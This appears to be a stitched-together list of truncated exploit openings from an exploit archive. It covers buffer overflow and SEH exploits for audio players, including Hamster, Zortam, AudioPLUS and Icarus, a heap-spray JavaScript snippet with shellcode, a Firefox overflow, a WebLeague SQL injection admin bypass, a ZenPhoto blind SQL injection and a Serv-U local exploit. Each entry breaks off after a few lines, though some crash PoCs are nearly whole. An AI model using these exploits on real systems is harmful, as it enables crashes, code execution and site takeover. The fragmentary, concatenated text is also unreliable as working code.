#!/usr/bin/perl -w # # MixSense DJ Studio (.mp3 file) Crash Vulnerability Exploit # # Founded and exploited by prodigy # # Contact: smack_the_stream@hotmail.com # # Vendor: MixSense # # Usage to reproduce the bug: when you created the malici
#!/usr/bin/perl #[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH) #[+] Author : ThE g0bL!N #[+] Greetz to all my friends #[+] Tested on: Windows XP Pro SP2 (Fr) ##[+] Big thnx: His0k4 ###################################################
#!/usr/bin/perl # # # Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities # # Product web page: http://www.zortam.com # # Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from # two different ma
#!/usr/bin/perl # # Title: Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability # Product Web Page: http://www.zortam.com # Tested On: Microsoft Windows XP Professional SP3 (English) # # ###===--- # # (1c0.7f8): Integer divide-by-zero
#!/usr/bin/perl -W # # WebLeague 2.2.0 Remote Admin Bypass p0c # written by ka0x ka0x01[at]gmail.com # # need magic_quotes_gpc = Off # # Vuln code (Admin/index.php) : # # 10:$sql=SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password
!-- http://en.securitylab.ru/poc/extra/382458.php -- html body script language=JavaScript var shellcode = unescape(evil code); var array = new Array(); var ls = 0x81000-(shellcode.length*2); var bigblock = unescape(%u0b0c%u0b0C); while(bigblock.lengt
html !-- Securitylab.ir , info@securitylab.ir -- head /head body center center pbfont size=+2Admin News Toolsi /i/fontfont size=2Remote Contents Change Vulnerability/font/b/p /center form action= http://site.com/news/system/message.php method=post di
________________________________________________________________________ One bug to rule them all IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror, Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more. Don't wet your pants - it's DoS only
------------------------------------------- Firefox 3.5 unicode stack overflow Andrew Haynes , Simon Berry-Byrne ------------------------------------------- html head script language=JavaScript type=Text/Javascript var str = unescape(%u4141%u4141);
# Hamster Audio Player 0.3a Local BOF PoC my $crash=x41 x 4113 ; open(myfile,'PoC.m3u')#/HPL print myfile $crash; # By ThE g0bL!N #Download:http://www.brothersoft.com/hamster-audio-player-download-235347.html #Note: His0k4 Win Rak :(
/* * ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit * Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category * * What does this exploit let you do: * The precoded functi
#!/usr/bin/perl # AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit # first exploiter hack4love http://www.milw0rm.com/exploits/9064 # and this the universal for .lst .m3u extention # Big Thnx to his0ka my best freind :d # Stack print A
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Icarus 2.0 (.ICP File) Local buffer Overflow (seh) # # Greetz to all my friends # form egypt ## easy :d ###PoC by : ThE g0bL!N ## this work sooooooooo good ## USAGE put the file GUEST.ICP in Ic
? /* serv-u 7 local exp ver 1.0 www.inbreak.net author kxlzx@xiaotou.org 2008-11-19 modify 2008-11-20 */ /* 下面是用到的主要数据包,给大家研究用。如果你用asp等语言再写一次,可以参考。 Global user list: GET /Admin/XML/OrganizationUsers.xmlID=161sync=